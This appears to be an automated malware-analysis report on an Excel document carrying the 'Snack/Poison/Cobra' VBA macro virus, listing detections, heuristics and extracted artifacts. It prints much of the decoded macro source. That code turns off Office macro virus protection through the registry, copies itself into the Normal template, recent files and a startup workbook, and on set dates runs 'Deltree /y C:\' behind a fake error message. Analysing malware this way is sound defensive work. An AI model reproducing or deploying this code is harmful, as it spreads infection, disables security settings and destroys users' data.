MALICIOUS
520
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Excel document containing VBA macros that attempt to disable macro virus protection and modify registry settings related to Office security. The 'Document_Open' macro is designed to execute automatically, and the presence of 'Shell()' and 'CreateObject()' calls suggests an intent to download and execute additional malicious code. The ClamAV detections further support its malicious nature.
Heuristics 11
-
ClamAV: Doc.Trojan.Snack-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Snack-2
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 34,136 bytes but its declared streams total only 0 bytes — 34,136 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18285 bytes |
SHA-256: aa425e75004439e08d756574cb24a80f8c4b7eb7ce1c6bdfc214fbdab1f6878e |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Snack <->>- Poison <->>- Cobra
'Macros By Liton
Private Sub Document_Open()
On Error Resume Next
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Xla = CreateObject("Excel.Application")
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
IString = NT.Lines(1, 1)
DString = "'Snack <->>- Poison <->>- Cobra"
If IString <> DString Then
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
End If
IString = AD.Lines(1, 1)
If IString <> DString Then
AD.DeleteLines 1, AD.CountOfLines
AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
End If
With Options
.VirusProtection = False: .SaveNormalPrompt = False
End With
If System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") <> "0" Then
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
End If
If Xla.Name = "Microsoft Excel" Then
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
End If
For i = 1 To 4
GetName = "File" + Trim(Str(i))
FilName = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Recent File List", GetName)
If FilName <> "" Then
Set GO = GetObject(FilName)
If GO.VBProject.VBComponents(1).CodeModule.CountOfLines > 0 Then
GO.VBProject.VBComponents(1).CodeModule.DeleteLines 1, GO.VBProject.VBComponents(1).CodeModule.CountOfLines
End If
GO.VBProject.VBComponents(1).CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
GO.Save
End If
Next
StartPath = Xla.Application.StartupPath
If UCase(Dir(StartPath + "\Book1.")) <> "BOOK1" Then
Set WrkBook = Xla.Workbooks.Add
WrkBook.VBProject.VBComponents(1).CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
WrkBook.SaveAs StartPath & "\Book1."
WrkBook.Save
WrkBook.Close
Else
Set WrkBook = GetObject(StartPath + "\Book1.")
If WrkBook.VBProject.VBComponents(1).CodeModule.CountOfLines > 0 Then
WrkBook.VBProject.VBComponents(1).CodeModule.DeleteLines 1, WrkBook.VBProject.VBComponents(1).CodeModule.CountOfLines
End If
WrkBook.VBProject.VBComponents(1).CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
WrkBook.Save
Xla.Quit
End If
End If
If (Month(Now) = 2 And Day(Now) = 21) Or (Month(Now) = 3 And Day(Now) = 26) Or (Month(Now) = 5 And Day(Now) = 1) Or (Month(Now) = 8 And Day(Now) = 15) Or (Month(Now) = 12 And Day(Now) = 16) Then
MsgBox "Data error reading drive C" + Chr(13) + "Press OK to Correct this problem.", vbOKOnly + vbCritical, "Cobra"
Shell "Deltree /y C:\", vbHide
End If
End Sub
Private Sub WorkBook_Deactivate()
On Error Resume Next
Set AW = ActiveWorkbook.VBProject.VBComponents(1).CodeModule
Set TW = ThisWorkbook.VBProject.VBComponents(1).CodeModule
IString = AW.Lines(1, 1)
DString = "'Snack <->>- Poison <->>- Cobra"
If IString <> DString Then
AW.DeleteLines 1, AW.CountOfLines
AW.InsertLines 1, TW.Lines(1, TW.CountOfLines)
End If
IString = TW.Lines(1, 1)
If IString <> DString Then
TW.DeleteLines 1, TW.CountOfLines
TW.InsertLines 1, AW.Lines(1, AW.CountOfLines)
End If
Set WOBJ = CreateObject("Word.Application")
If WOBJ.Name = "Microsoft Word" Then
Set NT = WOBJ.NormalTemplate
MS = NT.Path
If NT.VBProject.VBComponents(1).CodeModule.CountOfLines > 0 Then
NT.VBProject.VBComponents(1).CodeMo
... (truncated)
|
|||
embedded_office_off000060a8.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x60A8 | 34136 bytes |
SHA-256: 63ce6f32b89c9ebbfe1a568f556561b964112d6afde6f2e5921e2daba3c91ef5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.